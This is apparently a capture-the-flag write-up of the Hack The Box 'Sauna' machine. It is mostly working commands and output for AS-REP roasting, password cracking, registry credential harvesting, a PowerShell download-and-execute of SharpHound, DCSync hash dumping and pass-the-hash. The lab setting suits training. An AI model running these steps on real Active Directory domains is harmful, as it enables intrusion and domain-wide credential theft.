As always we start with an nmap scan
# Nmap 7.80 scan initiated Tue Feb 18 03:17:50 2020 as: nmap -A -oN allports 10.10.10.175 Nmap scan report for 10.10.10.175 Host is up (0.076s latency). Not shown: 988 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-18 16:19:56Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=2/18%Time=5E4B9DC1%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Network Distance: 2 hops Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 8h01m51s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-02-18T16:22:19 |_ start_date: N/A TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 100.30 ms 10.10.16.1 2 100.29 ms 10.10.10.175 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Feb 18 03:23:06 2020 -- 1 IP address (1 host up) scanned in 317.70 seconds
The most interesting ports open were: HTTP(80), Kerberos(88) and Win-RM (5985) .
User
I enumerated the Ldap port:
A lot of information was returned, but the most interesting part was:
root@kali:~/htb/sauna# ldapsearch -h 10.10.10.175 -p 389 -x -b "dc=EGOTISTICAL-BANK,dc=LOCAL" > ldaplogall.txt root@kali:~/htb/sauna# ls allports ldaplogall.txt # Hugo Smith, EGOTISTICAL-BANK.LOCAL dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
Now we have a possible username: “ Hugo Smith ”.
If you try to ASREPRoast that user you will find that it doesn’t exist. So I tried variations of the name and found one that was indeed a valid user: hsmith .
Variations I tried:
Hugo Smith HugoSmith hugo.smith h.smith hsmith smithh smith.h smith.hugo smithhugo smith hugo
Found user:
root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/ -usersfile hugosmith.txt Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] invalid principal syntax
So, now we have a valid user “ hsmith ” but no password…
It’s time to take a look to the web server. In there you will only find a few html pages, some
of them contains interesting names:
So, that we know the format that is being used to create the usernames, let’s check this usernames:
fsmith scoins sdriver btaylor hbear
We found that the user “ fsmith ” is vulnerable to ASREProast and we have obtained the crackable “hash”.
root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.LOCAL/FSmith Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Getting TGT for FSmith $krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:cb52c62c6143cf4cc4c71dccf64756f5$d216f5b0ae6326c1a3027dd19f3976e5a8259a5a1c4118f7f61da536f069ac63b15d65498c22399ff1d985819c280dbda2b88236429eaf03d4b1e25b7ba49323a378e4854c3e0b26b6ec7bb4c5245651e32ffb84025e34d9b05db659e80f2b510ccfcb3e0274b13fff13b6e650a987cb2d73f8288239ca15f7aa19e0914f48e5ccfe49af81e1aaf2f3864ed48ebe21e8f32258eeedcf7924022213178f4175dafd77b97dae029dbf57648cafd31769624759538c9f56a92cbf3bb52af1c19488fc633abedb85df88b6297cd921006a2e0706f20ae5a05d5091feeee6870ff014496e38ba7b397d90e4a42bb46940b2cecda70ac4de67dd1ed817028f37cbe46b
So, let’s crack it with john and rockyou:
c:\PENTEST\HASHCAT>hashcat32.exe -m 18200 -a 0 -w 3 EGOTISTICAL-BANK.hash e:\pentest\rockyou.txt --force hashcat (v5.1.0) starting... did not work for me root@kali:~/htb/sauna# john ego.hash -wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Thestrokes23 ($krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL) 1g 0:00:00:33 DONE (2020-02-18 04:48) 0.02995g/s 315720p/s 315720c/s 315720C/s Thines..Theredwolf_120691 Use the "--show" option to display all of the cracked passwords reliably Session completed
Credentials found: fsmith:Thestrokes23
Now, just connect via Win-RM and grab the user flag:
root@kali/opt/evil-winrm# ruby evil-winrm.rb -u fsmith -p "Thestrokes23" -i EGOTISTICAL-BANK.LOCAL *Evil-WinRM* PS C:\Users\FSmith\desktop> type user.txt 1b5520b98d97cf17f24122a55baf70cf *Evil-WinRM* PS C:\Users\FSmith\desktop> certutil -urlcache -split -f http://10.10.14.10/WINPEAS.exe C:\Users\FSmith\Documents\WINPEAS.exe
Root
I started enumerating the box using winPEAS
*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winpeas.exe systeminfo userinfo
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Creating Dynamic lists, this could take a while, please wait...
- Checking if domain...
- Getting Win32_UserAccount info...
--snip--
[+] RDP Sessions(T1087&T1033)
Not Found
[+] Ever logged users(T1087&T1033)
[X] Exception: System.Management.ManagementException: Access denied
at System.Management.ThreadDispatch.Start()
at System.Management.ManagementScope.Initialize()
at System.Management.ManagementObjectSearcher.Initialize()
at System.Management.ManagementObjectSearcher.Get()
at winPEAS.UserInfo.GetEverLoggedUsers()
Not Found
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
or it can be done manually
*Evil-WinRM* PS C:\Users\FSmith\Documents> REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x8e3982368
ShutdownFlags REG_DWORD 0x80000027
DisableLockWorkstation REG_DWORD 0x0
DefaultPassword REG_SZ Moneymakestheworldgoround!
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey
*Evil-WinRM* PS C:\Users\FSmith\Documents>
It found some interesting credentials inside the Winlogon registry:
There isn’t any user called “ svc_loanmanager ” but there is one called “ svc_loanmgr ” svc_loanmgr : Moneymakestheworldgoround!
And you can connect to it with the password extracted from the registry:
You can also use Sharphound to enumerate the Domain and you will find that the user svc_loanmgr has permissions to execute DCSync against the DC:
root@kali:/opt/evil-winrm# ruby evil-winrm.rb -u svc_loanmgr -p "Moneymakestheworldgoround!" -i EGOTISTICAL-BANK.LOCAL
Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.70/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'"
Initializing BloodHound at 5:42 PM on 2/18/2020
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Building GUID Cache
Starting Enumeration for EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Waiting for enumeration threads to finish
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Status: 60 objects enumerated (+60 ì/s --- Using 83 MB RAM )
Finished enumeration for EGOTISTICAL-BANK.LOCAL in 00:00:00.4511238
0 hosts failed ping. 0 hosts timedout.
Waiting for writer thread to finish
Compressing data to C:\Users\svc_loanmgr\Documents\20200218174244_BloodHound.zip.
You can upload this file directly to the UI.
Finished compressing files!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> download 20200218174244_BloodHound.zip Info: Downloading 20200218174244_BloodHound.zip to 20200218174244_BloodHound.zip Info: Download successful! *Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> exit Info: Exiting with code 0 root@kali:/opt/evil-winrm#
After examining the bloodhound graph, i figured out i could use aclpwn.py https://github.com/puckiestyle/aclpwn.py to set DCSync permission to user svc-loanmgr, and then use secretsdump.py to get the hashes
I use Sharphound to enumerate the Domain and found that the user svc_loanmgr has permissions to execute DCSync against the DC: .
I use Sharphound to enumerate the Domain and found that the user
svc_loanmgr has permissions to execute DCSync against the DC:root@kali:/opt/aclpwn.py# aclpwn -f svc_loanmgr -ft user -d EGOTISTICAL-BANK.LOCAL -du svc-loanmgr Please supply the password or LM:NTLM hashes of the account you are escalating from: Moneymakestheworldgoround! [+] Path found! Path: (SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL)-[GetChangesAll]->(EGOTISTICAL-BANK.LOCAL) [-] DCSync -> continue [+] Finished running tasks
root@kali:/opt/aclpwn.py# secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr@10.10.10.175 -just-dc Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation Password: Moneymakestheworldgoround! [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c::: EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c::: SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:7a2965077fddedf348d938e4fa20ea1b::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031 Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0 Administrator:des-cbc-md5:19d5f15d689b1ce5 krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24 krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9 krbtgt:des-cbc-md5:c170d5dc3edfc1d9 EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324 EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9 EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7 EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2 EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2 SAUNA$:aes256-cts-hmac-sha1-96:a90968c91de5f77ac3b7d938bd760002373f71e14e1a027b2d93d1934d64754a SAUNA$:aes128-cts-hmac-sha1-96:0bf0c486c1262ab6cf46b16dc3b1b198 SAUNA$:des-cbc-md5:b989ecc101ae4ca1 [*] Cleaning up...
root@kali:~/htb/sauna# psexec.py -hashes d9485863c1e9e05851aa40cbb4ab9dff:d9485863c1e9e05851aa40cbb4ab9dff administrator@10.10.10.175 Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Requesting shares on 10.10.10.175..... [*] Found writable share ADMIN$ [*] Uploading file hPakdifs.exe [*] Opening SVCManager on 10.10.10.175..... [*] Creating service LxqM on 10.10.10.175..... [*] Starting service LxqM..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.973] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Windows\system32> c:\Users\Administrator\Desktop>type root.txt f3ee04965c68257382e31502cc5e881f
reference used : https://github.com/fox-it/aclpwn.py
files used : https://github.com/puckiestyle/aclpwn.py
Author :Puckiestyle